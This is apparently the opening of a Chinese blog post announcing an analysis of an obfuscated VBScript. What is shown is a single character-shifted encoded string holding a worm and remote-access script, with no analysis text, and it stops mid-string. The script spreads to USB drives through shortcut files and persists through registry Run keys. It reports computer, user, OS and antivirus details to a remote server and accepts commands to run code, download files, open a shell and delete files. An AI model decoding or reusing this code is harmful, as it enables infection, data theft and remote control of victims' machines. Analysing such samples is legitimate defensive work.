vbs混淆脚本分析

这里是混淆的代码

L = 0 : If (L = 0) Then : X = "Ͳ·Φͫνΰήκίΰνͫ΅ͫγκπίδιδͫͳήʹͫξζτλΰͫ΅ͫγκπίδιδ͸ασͫΨΉ͕͕͘͘ͲΈ͸Έ͸Έ͸Έ͸ΈͫήκιαδβͫΈ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͕͕͘͘γκξοͫΈͫͭρδΰςδ͹λπέηδήρθ͹ήκθ͕ͭ͘λκνοͫΈͫͿͿ͕͘διξοάηηίδνͫΈͫͭͰοΰθλͰ͕ͭ͘ηιζαδηΰͫΈͫονπΰ͕͘ηιζακηίΰνͫΈͫονπΰ͕͕͘͘ͲΈ͸Έ͸Έ͸Έ͸ΈͫλπέηδήͫράνͫΈ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͕͕͘͘ίδθͫξγΰηηκέε͕ͫ͘ξΰοͫξγΰηηκέεͫΈͫςξήνδλο͹ήνΰάοΰκέεΰήοͳͭςξήνδλο͹ξγΰηηͭʹ͕͘ίδθͫαδηΰξτξοΰθκέε͕͘ξΰοͫαδηΰξτξοΰθκέεͫΈͫήνΰάοΰκέεΰήοͳͭξήνδλοδιβ͹αδηΰξτξοΰθκέεΰήοͭʹ͕͘ίδθͫγοολκέε͕͘ξΰοͫγοολκέεͫΈͫήνΰάοΰκέεΰήοͳͭθξσθηͽ͹σθηγοολͭʹ͕͕͕͘͘͘ͲΈ͸Έ͸Έ͸Έ͸ΈͫλνδράοͫράνͫΈ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͕͕͘͘διξοάηηιάθΰͫΈͫςξήνδλο͹ξήνδλοιάθΰ͕͘ξοάνοπλͫΈͫξγΰηηκέε͹ξλΰήδάηακηίΰνξͫͳͭξοάνοπλͭʹͫͱͫͭΧ͕ͭ͘διξοάηηίδνͫΈͫξγΰηηκέε͹ΰσλάιίΰιρδνκιθΰιοξονδιβξͳδιξοάηηίδνʹͫͱͫͭΧ͕ͭ͘δαͫικοͫαδηΰξτξοΰθκέε͹ακηίΰνΰσδξοξͳδιξοάηηίδνʹͫογΰιͫͫδιξοάηηίδνͫΈͫξγΰηηκέε͹ΰσλάιίΰιρδνκιθΰιοξονδιβξͳͭͰοΰθλͰͭʹͫͱͫͭΧ͕ͭ͘ξληδοΰνͫΈͫͭ·ͭͫͱͫͭχͭͫͱͫͭΉ͕ͭ͘ξηΰΰλͫΈͫ΀ͻͻͻ͕ͫ͘ίδθͫνΰξλκιξΰ͕͘ίδθͫήθί͕͘ίδθͫλάνάθ͕͘διακͫΈ͕ͫͭͭ͘πξέξλνΰάίδιβͫΈ͕ͫͭͭ͘ξοάνοίάοΰͫΈ͕ͫͭͭ͘ίδθͫκιΰκιήΰ͕͕͘͘ͲΈ͸Έ͸Έ͸Έ͸ΈͫήκίΰͫξοάνοͫΈ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͕͘κιͫΰννκνͫνΰξπθΰͫιΰσο͕͕͕͘͘͘διξοάιήΰ͕͘ςγδηΰͫονπΰ͕͕͘͘διξοάηη͕͕͘͘νΰξλκιξΰͫΈ͕ͫͭͭ͘νΰξλκιξΰͫΈͫλκξοͫͳͭδξ͸νΰάίτͭͷͭͭʹ͕͘ήθίͫΈͫξληδοͫͳνΰξλκιξΰͷξληδοΰνʹ͕͘ξΰηΰήοͫήάξΰͫήθίͫͳͻʹ͕͘ήάξΰͫͭΰσήΰήποΰ͕ͭͫͫͫͫͫͫ͘λάνάθͫΈͫήθίͫͳͼʹ͕ͫͫͫͫͫͫ͘ΰσΰήποΰͫλάνάθ͕͘ήάξΰͫͭπλίάοΰ͕ͭͫͫͫͫͫͫ͘λάνάθͫΈͫήθίͫͳͼʹ͕ͫͫͫͫͫͫ͘κιΰκιήΰ͹ήηκξΰ͕ͫͫͫͫͫͫ͘ξΰοͫκιΰκιήΰͫΈͫͫαδηΰξτξοΰθκέε͹κλΰιοΰσοαδηΰͫͳδιξοάηηίδνͫͱͫδιξοάηηιάθΰͫͷͽͷͫαάηξΰʹ͕ͫͫͫͫͫͫ͘κιΰκιήΰ͹ςνδοΰͫλάνάθ͕ͫͫͫͫͫͫ͘κιΰκιήΰ͹ήηκξΰ͕ͫͫͫͫͫͫ͘ξγΰηηκέε͹νπιͫͭςξήνδλο͹ΰσΰͫͺͺ΍ͫͭͫͱͫήγνͳ;Ϳʹͫͱͫδιξοάηηίδνͫͱͫδιξοάηηιάθΰͫͱͫήγνͳ;Ϳʹ͕ͫͫͫͫͫͫ͘ςξήνδλο͹μπδο͕ͫ͘ήάξΰͫͭπιδιξοάηη͕ͭͫͫͫͫͫͫ͘πιδιξοάηη͕͘ήάξΰͫͭξΰιί͕ͭͫͫͫͫͫͫ͘ίκςιηκάίͫήθίͫͳͼʹͷήθίͫͳͽʹ͕͘ήάξΰͫͭξδοΰ͸ξΰιί͕ͭͫͫͫͫͫͫ͘ξδοΰίκςιηκάίΰνͫήθίͫͳͼʹͷήθίͫͳͽʹ͕͘ήάξΰͫͭνΰήρ͕ͭͫͫͫͫͫͫ͘λάνάθͫΈͫήθίͫͳͼʹ͕ͫͫͫͫͫͫ͘πληκάίͫͳλάνάθʹ͕͘ήάξΰͫͫͭΰιπθ͸ίνδρΰν͕ͭͫͫͫͫͫͫ͘λκξοͫͭδξ͸ΰιπθ͸ίνδρΰνͭͷΰιπθίνδρΰν͕ͫͫ͘ήάξΰͫͫͭΰιπθ͸αάα͕ͭͫͫͫͫͫͫ͘λάνάθͫΈͫήθίͫͳͼʹ͕ͫͫͫͫͫͫ͘λκξοͫͭδξ͸ΰιπθ͸αάαͭͷΰιπθαάαͫͳλάνάθʹ͕͘ήάξΰͫͫͭΰιπθ͸λνκήΰξξ͕ͭͫͫͫͫͫͫ͘λκξοͫͭδξ͸ΰιπθ͸λνκήΰξξͭͷΰιπθλνκήΰξξ͕ͫͫͫ͘ήάξΰͫͫͭήθί͸ξγΰηη͕ͭͫͫͫͫͫͫ͘λάνάθͫΈͫήθίͫͳͼʹ͕ͫͫͫͫͫͫ͘λκξοͫͭδξ͸ήθί͸ξγΰηηͭͷήθίξγΰηηͫͳλάνάθʹ͕ͫͫ͘ήάξΰͫͫͭίΰηΰοΰ͕ͭͫͫͫͫͫͫ͘λάνάθͫΈͫήθίͫͳͼʹ͕ͫͫͫͫͫͫ͘ίΰηΰοΰαάαͫͳλάνάθʹ͕ͫ͘ήάξΰͫͫͭΰσδο͸λνκήΰξξ͕ͭͫͫͫͫͫͫ͘λάνάθͫΈͫήθίͫͳͼʹ͕ͫͫͫͫͫͫ͘ΰσδολνκήΰξξͫͳλάνάθʹ͕ͫ͘ήάξΰͫͫͭξηΰΰλ͕ͭͫͫͫͫͫͫ͘λάνάθͫΈͫήθίͫͳͼʹ͕ͫͫͫͫͫͫ͘ξηΰΰλͫΈͫΰράηͫͳλάνάθʹ͕ͫͫͫͫͫͫͫͫ͘ΰιίͫξΰηΰήο͕͕͘͘ςξήνδλο͹ξηΰΰλͫξηΰΰλ͕͕͘͘ςΰιί͕͕͕͘͘͘ξπέͫδιξοάηη͕͘κιͫΰννκνͫνΰξπθΰͫιΰσο͕͘ίδθͫηιζκέε͕͘ίδθͫαδηΰιάθΰ͕͘ίδθͫακηίΰνιάθΰ͕͘ίδθͫαδηΰδήκι͕͘ίδθͫακηίΰνδήκι͕͕͘͘πλξοάνο͕͘ακνͫΰάήγͫίνδρΰͫδιͫαδηΰξτξοΰθκέε͹ίνδρΰξ͕͕͘͘δαͫͫίνδρΰ͹δξνΰάίτͫΈͫονπΰͫογΰι͕͘δαͫͫίνδρΰ͹ανΰΰξλάήΰͫͫΉͫͻͫογΰι͕͘δαͫͫίνδρΰ͹ίνδρΰοτλΰͫͫΈͫͼͫογΰι͕ͫͫͫͫ͘αδηΰξτξοΰθκέε͹ήκλταδηΰͫςξήνδλο͹ξήνδλοαπηηιάθΰͫͷͫίνδρΰ͹λάογͫͱͫͭΧͭͫͱͫδιξοάηηιάθΰͷονπΰ͕ͫͫͫͫ͘δαͫͫαδηΰξτξοΰθκέε͹αδηΰΰσδξοξͫͳίνδρΰ͹λάογͫͱͫͭΧͭͫͱͫδιξοάηηιάθΰʹͫͫογΰι͕ͫͫͫͫͫͫͫͫ͘αδηΰξτξοΰθκέε͹βΰοαδηΰͳίνδρΰ͹λάογͫͱͫͭΧͭͫͫͱͫδιξοάηηιάθΰʹ͹άοονδέποΰξͫΈͫͽͶͿ͕ͫͫͫͫ͘ΰιίͫδα͕ͫͫͫͫ͘ακνͫΰάήγͫαδηΰͫδιͫαδηΰξτξοΰθκέε͹βΰοακηίΰνͳͫίνδρΰ͹λάογͫͱͫͭΧͭͫʹ͹Αδηΰξ͕ͫͫͫͫͫͫͫͫ͘δαͫικοͫηιζαδηΰͫογΰιͫΰσδοͫακν͕ͫͫͫͫͫͫͫͫ͘δαͫͫδιξονͫͳαδηΰ͹ιάθΰͷͭ͹ͭʹͫογΰι͕ͫͫͫͫͫͫͫͫͫͫͫͫ͘δαͫͫηήάξΰͫͳξληδοͳαδηΰ͹ιάθΰͷͫͭ͹ͭʹͫͳπέκπιίͳξληδοͳαδηΰ͹ιάθΰͷͫͭ͹ͭʹʹʹʹͫ·Ήͫͭηιζͭͫογΰι͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘αδηΰ͹άοονδέποΰξͫΈͫͽͶͿ͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘δαͫͫπήάξΰͫͳαδηΰ͹ιάθΰʹͫ·Ήͫπήάξΰͫͳδιξοάηηιάθΰʹͫογΰι͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘αδηΰιάθΰͫΈͫξληδοͳαδηΰ͹ιάθΰͷͭ͹ͭʹ͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘ξΰοͫηιζκέεͫΈͫξγΰηηκέε͹ήνΰάοΰξγκνοήποͫͳίνδρΰ͹λάογͫͱͫͭΧͭͫͫͱͫαδηΰιάθΰͫͳͻʹͫͱͫͭ͹ηιζͭʹ͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘ηιζκέε͹ςδιίκςξοτηΰͫΈͫ΂͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘ηιζκέε͹οάνβΰολάογͫΈͫͭήθί͹ΰσΰ͕ͭͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘ηιζκέε͹ςκνζδιβίδνΰήοκντͫΈ͕ͫͭͭͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘ηιζκέε͹άνβπθΰιοξͫΈͫͭͺήͫξοάνοͫͭͫͱͫνΰληάήΰͳδιξοάηηιάθΰͷͭͫͭͷͫήγνςͳ;Ϳʹͫͱͫͭͫͭͫͱͫήγνςͳ;Ϳʹʹͫͱͫͭͱξοάνοͫͭͫͱͫνΰληάήΰͳαδηΰ͹ιάθΰͷͭͫͭͷͫήγνςͳ;Ϳʹͫͱͫͭͫͭͫͱͫήγνςͳ;Ϳʹʹͫͱͭͱΰσδο͕ͭͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘αδηΰδήκιͫΈͫξγΰηηκέε͹νΰβνΰάίͫͳͭΓΖΐΤΪΗΚΎΌΗΪΘΌΎΓΔΙΐΧξκαοςάνΰΧήηάξξΰξΧͭͫͱͫξγΰηηκέε͹νΰβνΰάίͫͳͭΓΖΐΤΪΗΚΎΌΗΪΘΌΎΓΔΙΐΧξκαοςάνΰΧήηάξξΰξΧ͹ͭͫͱͫξληδοͳαδηΰ͹ιάθΰͷͫͭ͹ͭʹͳπέκπιίͳξληδοͳαδηΰ͹ιάθΰͷͫͭ͹ͭʹʹʹͱͫͭΧͭʹͫͱͫͭΧίΰαάπηοδήκιΧͭʹ͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘δαͫͫδιξονͫͳαδηΰδήκιͷͭͷͭʹͫΈͫͻͫογΰι͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘ηιζκέε͹δήκιηκήάοδκιͫΈͫαδηΰ͹λάογ͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘ΰηξΰ͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘ηιζκέε͹δήκιηκήάοδκιͫΈͫαδηΰδήκι͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘ΰιίͫδα͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘ηιζκέε͹ξάρΰͳʹ͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘ΰιίͫδα͕ͫͫͫͫͫͫͫͫͫͫͫͫ͘ΰιίͫδα͕ͫͫͫͫͫͫͫͫ͘ΰιίͫδα͕ͫͫͫͫ͘ιΰσο͕ͫͫͫͫ͘ακνͫΰάήγͫακηίΰνͫδιͫαδηΰξτξοΰθκέε͹βΰοακηίΰνͳͫίνδρΰ͹λάογͫͱͫͭΧͭͫʹ͹ξπέακηίΰνξ͕ͫͫͫͫͫͫͫͫ͘δαͫικοͫηιζακηίΰνͫογΰιͫΰσδοͫακν͕ͫͫͫͫͫͫͫͫ͘ακηίΰν͹άοονδέποΰξͫΈͫͽͶͿ͕ͫͫͫͫͫͫͫͫ͘ακηίΰνιάθΰͫΈͫακηίΰν͹ιάθΰ͕ͫͫͫͫͫͫͫͫ͘ξΰοͫηιζκέεͫΈͫξγΰηηκέε͹ήνΰάοΰξγκνοήποͫͳίνδρΰ͹λάογͫͱͫͭΧͭͫͫͱͫακηίΰνιάθΰͫͱͫͭ͹ηιζͭʹ͕ͫͫͫͫͫͫͫͫͫ͘ηιζκέε͹ςδιίκςξοτηΰͫΈͫ΂͕ͫͫͫͫͫͫͫͫ͘ηιζκέε͹οάνβΰολάογͫΈͫͭήθί͹ΰσΰ͕ͭͫͫͫͫͫͫͫͫ͘ηιζκέε͹ςκνζδιβίδνΰήοκντͫΈ͕ͫͭͭͫͫͫͫͫͫͫͫ͘ηιζκέε͹άνβπθΰιοξͫΈͫͭͺήͫξοάνοͫͭͫͱͫνΰληάήΰͳδιξοάηηιάθΰͷͭͫͭͷͫήγνςͳ;Ϳʹͫͱͫͭͫͭͫͱͫήγνςͳ;Ϳʹʹͫͱͫͭͱξοάνοͫΰσληκνΰνͫͭͫͱͫνΰληάήΰͳακηίΰν͹ιάθΰͷͭͫͭͷͫήγνςͳ;Ϳʹͫͱͫͭͫͭͫͱͫήγνςͳ;Ϳʹʹͫͱͭͱΰσδο͕ͭͫͫͫͫͫͫͫͫ͘ακηίΰνδήκιͫΈͫξγΰηηκέε͹νΰβνΰάίͫͳͭΓΖΐΤΪΗΚΎΌΗΪΘΌΎΓΔΙΐΧξκαοςάνΰΧήηάξξΰξΧακηίΰνΧίΰαάπηοδήκιΧͭʹ͕ͫͫͫͫͫͫͫͫͫ͘δαͫͫδιξονͫͳακηίΰνδήκιͷͭͷͭʹͫΈͫͻͫογΰι͕ͫͫͫͫͫͫͫͫͫͫͫͫ͘ηιζκέε͹δήκιηκήάοδκιͫΈͫακηίΰν͹λάογ͕ͫͫͫͫͫͫͫͫ͘ΰηξΰ͕ͫͫͫͫͫͫͫͫͫͫͫͫͫ͘ηιζκέε͹δήκιηκήάοδκιͫΈͫακηίΰνδήκι͕ͫͫͫͫͫͫͫͫ͘ΰιίͫδα͕ͫͫͫͫͫͫͫͫ͘ηιζκέε͹ξάρΰͳʹ͕ͫͫͫͫ͘ιΰσο͕͘ΰιίͫΔα͕͘ΰιίͫΔα͕͘ΰιίͫδα͕͘ιΰσο͕͘ΰνν͹ήηΰάν͕͘ΰιίͫξπέ͕͕͘͘ξπέͫπιδιξοάηη͕͘κιͫΰννκνͫνΰξπθΰͫιΰσο͕͘ίδθͫαδηΰιάθΰ͕͘ίδθͫακηίΰνιάθΰ͕͕͘͘ξγΰηηκέε͹νΰβίΰηΰοΰͫͭΓΖΐΤΪΎΠΝΝΐΙΟΪΠΞΐΝΧξκαοςάνΰΧθδήνκξκαοΧςδιίκςξΧήπννΰιορΰνξδκιΧνπιΧͭͫͱͫξληδοͫͳδιξοάηηιάθΰͷͭ͹ͭʹͳͻʹ͕͘ξγΰηηκέε͹νΰβίΰηΰοΰͫͭΓΖΐΤΪΗΚΎΌΗΪΘΌΎΓΔΙΐΧξκαοςάνΰΧθδήνκξκαοΧςδιίκςξΧήπννΰιορΰνξδκιΧνπιΧͭͫͱͫξληδοͫͳδιξοάηηιάθΰͷͭ͹ͭʹͳͻʹ͕͘αδηΰξτξοΰθκέε͹ίΰηΰοΰαδηΰͫξοάνοπλͫͱͫδιξοάηηιάθΰͫͷονπΰ͕͘αδηΰξτξοΰθκέε͹ίΰηΰοΰαδηΰͫςξήνδλο͹ξήνδλοαπηηιάθΰͫͷονπΰ͕͕͘͘ακνͫͫΰάήγͫίνδρΰͫδιͫαδηΰξτξοΰθκέε͹ίνδρΰξ͕͘δαͫͫίνδρΰ͹δξνΰάίτͫΈͫονπΰͫογΰι͕͘δαͫͫίνδρΰ͹ανΰΰξλάήΰͫͫΉͫͻͫογΰι͕͘δαͫͫίνδρΰ͹ίνδρΰοτλΰͫͫΈͫͼͫογΰι͕ͫͫͫͫ͘ακνͫͫΰάήγͫαδηΰͫδιͫαδηΰξτξοΰθκέε͹βΰοακηίΰνͫͳͫίνδρΰ͹λάογͫͱͫͭΧͭʹ͹αδηΰξ͕ͫͫͫͫͫͫͫͫͫ͘κιͫΰννκνͫνΰξπθΰͫιΰσο͕ͫͫͫͫͫͫͫͫͫ͘δαͫͫδιξονͫͳαδηΰ͹ιάθΰͷͭ͹ͭʹͫογΰι͕ͫͫͫͫͫͫͫͫͫͫͫͫͫ͘δαͫͫηήάξΰͫͳξληδοͳαδηΰ͹ιάθΰͷͫͭ͹ͭʹͳπέκπιίͳξληδοͳαδηΰ͹ιάθΰͷͫͭ͹ͭʹʹʹʹͫ·Ήͫͭηιζͭͫογΰι͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘αδηΰ͹άοονδέποΰξͫΈͫͻ͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘δαͫͫπήάξΰͫͳαδηΰ͹ιάθΰʹͫ·Ήͫπήάξΰͫͳδιξοάηηιάθΰʹͫογΰι͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘αδηΰιάθΰͫΈͫξληδοͳαδηΰ͹ιάθΰͷͭ͹ͭʹ͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘αδηΰξτξοΰθκέε͹ίΰηΰοΰαδηΰͫͳίνδρΰ͹λάογͫͱͫͭΧͭͫͱͫαδηΰιάθΰͳͻʹͫͱͫͭ͹ηιζͭͫʹ͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘ΰηξΰ͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘αδηΰξτξοΰθκέε͹ίΰηΰοΰαδηΰͫͳίνδρΰ͹λάογͫͱͫͭΧͭͫͱͫαδηΰ͹ιάθΰʹ͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘ΰιίͫΔα͕ͫͫͫͫͫͫͫͫͫͫͫͫͫ͘ΰηξΰ͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘αδηΰξτξοΰθκέε͹ίΰηΰοΰαδηΰͫͳαδηΰ͹λάογʹ͕ͫͫͫͫͫͫͫͫͫͫͫͫͫͫ͘ΰιίͫδα͕ͫͫͫͫͫͫͫͫͫ͘ΰιίͫδα͕ͫͫͫͫͫ͘ιΰσο͕ͫͫͫͫͫ͘ακνͫΰάήγͫακηίΰνͫδιͫαδηΰξτξοΰθκέε͹βΰοακηίΰνͳͫίνδρΰ͹λάογͫͱͫͭΧͭͫʹ͹ξπέακηίΰνξ͕ͫͫͫͫͫͫͫͫͫ͘ακηίΰν͹άοονδέποΰξͫΈͫͻ͕ͫͫͫͫͫ͘ιΰσο͕͘ΰιίͫδα͕͘ΰιίͫδα͕͘ΰιίͫδα͕͘ιΰσο͕͘ςξήνδλο͹μπδο͕͘ΰιίͫξπέ͕͕͘͘απιήοδκιͫλκξοͫͳήθίͫͷλάνάθʹ͕͕͘͘λκξοͫΈͫλάνάθ͕͘γοολκέε͹κλΰιͫͭλκξοͭͷͭγοολ΅ͺͺͭͫͱͫγκξοͫͱͫͭ΅ͭͫͱͫλκνοͫͱͭͺͭͫͱͫήθίͷͫαάηξΰ͕͘γοολκέε͹ξΰονΰμπΰξογΰάίΰνͫͭπξΰν͸άβΰιο΅ͭͷδιακνθάοδκι͕͘γοολκέε͹ξΰιίͫλάνάθ͕͘λκξοͫΈͫγοολκέε͹νΰξλκιξΰοΰσο͕͘ΰιίͫαπιήοδκι͕͕͘͘απιήοδκιͫδιακνθάοδκι͕͘κιͫΰννκνͫνΰξπθΰͫιΰσο͕͘δαͫͫδιαͫΈͫͭͭͫογΰι͕ͫͫͫͫ͘διαͫΈͫγςδίͫͱͫξληδοΰν͕ͫͫͫͫͫ͘διαͫΈͫδιαͫͫͱͫξγΰηηκέε͹ΰσλάιίΰιρδνκιθΰιοξονδιβξͳͭͰήκθλποΰνιάθΰͰͭʹͫͱͫξληδοΰν͕ͫͫͫͫͫ͘διαͫΈͫδιαͫͫͱͫξγΰηηκέε͹ΰσλάιίΰιρδνκιθΰιοξονδιβξͳͭͰπξΰνιάθΰͰͭʹͫͱͫξληδοΰν͕͕ͫͫͫͫ͘͘ξΰοͫνκκοͫΈͫβΰοκέεΰήοͳͭςδιθβθοξ΅φδθλΰνξκιάοδκιηΰρΰηΈδθλΰνξκιάοΰψͬΧΧ͹ΧνκκοΧήδθρͽͭʹ͕ͫͫͫͫ͘ξΰοͫκξͫΈͫνκκο͹ΰσΰήμπΰντͫͳͭξΰηΰήοͫ͵ͫανκθͫςδι;ͽΪκλΰνάοδιβξτξοΰθͭʹ͕ͫͫͫͫ͘ακνͫΰάήγͫκξδιακͫδιͫκξ͕ͫͫͫͫͫͫͫ͘διαͫΈͫδιαͫͱͫκξδιακ͹ήάλοδκιͫͱͫξληδοΰν͕ͫͫͫͫͫͫͫͫͫ͘ΰσδοͫακν͕ͫͫͫͫ͘ιΰσο͕ͫͫͫͫ͘διαͫΈͫδιαͫͱͫͭληπξͭͫͱͫξληδοΰν͕ͫͫͫͫ͘διαͫΈͫδιαͫͱͫξΰήπνδοτͫͱͫξληδοΰν͕ͫͫͫͫ͘διαͫΈͫδιαͫͱͫπξέξλνΰάίδιβ͕ͫͫͫͫ͘διακνθάοδκιͫΈͫδια͕ͫͫ͘ΰηξΰ͕ͫͫͫͫ͘διακνθάοδκιͫΈͫδια͕͘ΰιίͫδα͕͘ΰιίͫαπιήοδκι͕͕͕͘͘͘ξπέͫπλξοάνοͫͳʹ͕͘κιͫΰννκνͫνΰξπθΰͫΙΰσο͕͕͘͘ξγΰηηκέε͹νΰβςνδοΰͫͭΓΖΐΤΪΎΠΝΝΐΙΟΪΠΞΐΝΧξκαοςάνΰΧθδήνκξκαοΧςδιίκςξΧήπννΰιορΰνξδκιΧνπιΧͭͫͱͫξληδοͫͳδιξοάηηιάθΰͷͭ͹ͭʹͳͻʹͷͫͫͭςξήνδλο͹ΰσΰͫͺͺ΍ͫͭͫͱͫήγνςͳ;Ϳʹͫͱͫδιξοάηηίδνͫͱͫδιξοάηηιάθΰͫͱͫήγνςͳ;ͿʹͫͷͫͭΝΐΒΪΞΥ͕ͭ͘ξγΰηηκέε͹νΰβςνδοΰͫͭΓΖΐΤΪΗΚΎΌΗΪΘΌΎΓΔΙΐΧξκαοςάνΰΧθδήνκξκαοΧςδιίκςξΧήπννΰιορΰνξδκιΧνπιΧͭͫͱͫξληδοͫͳδιξοάηηιάθΰͷͭ͹ͭʹͳͻʹͷͫͫͭςξήνδλο͹ΰσΰͫͺͺ΍ͫͭͫͫͱͫήγνςͳ;Ϳʹͫͱͫδιξοάηηίδνͫͱͫδιξοάηηιάθΰͫͱͫήγνςͳ;ͿʹͫͷͫͭΝΐΒΪΞΥ͕ͭ͘αδηΰξτξοΰθκέε͹ήκλταδηΰͫςξήνδλο͹ξήνδλοαπηηιάθΰͷδιξοάηηίδνͫͱͫδιξοάηηιάθΰͷονπΰ͕͘αδηΰξτξοΰθκέε͹ήκλταδηΰͫςξήνδλο͹ξήνδλοαπηηιάθΰͷξοάνοπλͫͱͫδιξοάηηιάθΰͫͷονπΰ͕͕͘͘ΰιίͫξπέ͕͕͕͘͘͘απιήοδκιͫγςδί͕͘κιͫΰννκνͫνΰξπθΰͫιΰσο͕͕͘͘ξΰοͫνκκοͫΈͫβΰοκέεΰήοͳͭςδιθβθοξ΅φδθλΰνξκιάοδκιηΰρΰηΈδθλΰνξκιάοΰψͬΧΧ͹ΧνκκοΧήδθρͽͭʹ͕͘ξΰοͫίδξζξͫΈͫνκκο͹ΰσΰήμπΰντͫͳͭξΰηΰήοͫ͵ͫανκθͫςδι;ͽΪηκβδήάηίδξζͭʹ͕͘ακνͫΰάήγͫίδξζͫδιͫίδξζξ͕ͫͫͫͫ͘δαͫͫίδξζ͹ρκηπθΰξΰνδάηιπθέΰνͫ·Ήͫͭͭͫογΰι͕ͫͫͫͫͫͫͫͫ͘γςδίͫΈͫίδξζ͹ρκηπθΰξΰνδάηιπθέΰν͕ͫͫͫͫͫͫͫͫ͘ΰσδοͫακν͕ͫͫͫͫ͘ΰιίͫδα͕͘ιΰσο͕͘ΰιίͫαπιήοδκι͕͕͕͘͘͘απιήοδκιͫξΰήπνδοτ͕ͫ͘κιͫΰννκνͫνΰξπθΰͫιΰσο͕͕͘͘ξΰήπνδοτͫΈ͕͕ͫͭͭ͘͘ξΰοͫκέεςθδξΰνρδήΰͫΈͫβΰοκέεΰήοͳͭςδιθβθοξ΅φδθλΰνξκιάοδκιηΰρΰηΈδθλΰνξκιάοΰψͬΧΧ͹ΧνκκοΧήδθρͽͭʹ͕͘ξΰοͫήκηδοΰθξͫΈͫκέεςθδξΰνρδήΰ͹ΰσΰήμπΰντͳͭξΰηΰήοͫ͵ͫανκθͫςδι;ͽΪκλΰνάοδιβξτξοΰθͭͷͷͿ΃ʹ͕͘ακνͫΰάήγͫκέεδοΰθͫδιͫήκηδοΰθξ͕ͫͫͫͫ͘ρΰνξδκιξονͫΈͫξληδοͫͳκέεδοΰθ͹ρΰνξδκιͷͭ͹ͭʹ͕͘ιΰσο͕͘ρΰνξδκιξονͫΈͫξληδοͫͳήκηδοΰθξ͹ρΰνξδκιͷͭ͹ͭʹ͕͘κξρΰνξδκιͫΈͫρΰνξδκιξονͫͳͻʹͫͱͫͭ͹͕ͭ͘ακνͫͫσͫΈͫͼͫοκͫπέκπιίͫͳρΰνξδκιξονʹ͕͔ͫ͘κξρΰνξδκιͫΈͫκξρΰνξδκιͫͱͫͫρΰνξδκιξονͫͳδʹ͕͘ιΰσο͕͘κξρΰνξδκιͫΈͫΰράηͫͳκξρΰνξδκιʹ͕͘δαͫͫκξρΰνξδκιͫΉͫ΁ͫογΰιͫξήͫΈͫͭξΰήπνδοτήΰιοΰνͽͭͫΰηξΰͫξήͫΈͫͭξΰήπνδοτήΰιοΰν͕͕ͭ͘͘ξΰοͫκέεξΰήπνδοτήΰιοΰνͫΈͫβΰοκέεΰήοͳͭςδιθβθοξ΅ΧΧηκήάηγκξοΧνκκοΧͭͫͱͫξήʹ͕͘ΞΰοͫήκηάιοδρδνπξͫΈͫκέεξΰήπνδοτήΰιοΰν͹ΰσΰήμπΰντͳͭξΰηΰήοͫ͵ͫανκθͫάιοδρδνπξλνκίπήοͭͷͭςμηͭͷͻʹ͕͕͘͘ακνͫΰάήγͫκέεάιοδρδνπξͫδιͫήκηάιοδρδνπξ͕ͫͫͫͫ͘ξΰήπνδοτͫͫΈͫξΰήπνδοτͫͫͱͫκέεάιοδρδνπξ͹ίδξληάτιάθΰͫͱͫͭͫ͹͕ͭ͘ιΰσο͕͘δαͫξΰήπνδοτͫͫΈͫͭͭͫογΰιͫξΰήπνδοτͫͫΈͫͭιάι͸άρ͕ͭ͘ΰιίͫαπιήοδκι͕͕͕͘͘͘απιήοδκιͫδιξοάιήΰ͕͘κιͫΰννκνͫνΰξπθΰͫιΰσο͕͕͘͘πξέξλνΰάίδιβͫΈͫξγΰηηκέε͹νΰβνΰάίͫͳͭΓΖΐΤΪΗΚΎΌΗΪΘΌΎΓΔΙΐΧξκαοςάνΰΧͭͫͱͫξληδοͫͳδιξοάηηιάθΰͷͭ͹ͭʹͳͻʹͫͱͫͭΧͭʹ͕͘δαͫπξέξλνΰάίδιβͫΈͫͭͭͫογΰι͕ͫͫͫ͘δαͫηήάξΰͫͳͫθδίͳςξήνδλο͹ξήνδλοαπηηιάθΰͷͽʹʹͫΈͫͭ΅Χͭͫͱͫͫηήάξΰͳδιξοάηηιάθΰʹͫογΰι͕ͫͫͫͫͫͫ͘πξέξλνΰάίδιβͫΈͫͭονπΰͫ͸ͫͭͫͱͫίάοΰ͕ͫͫͫͫͫͫ͘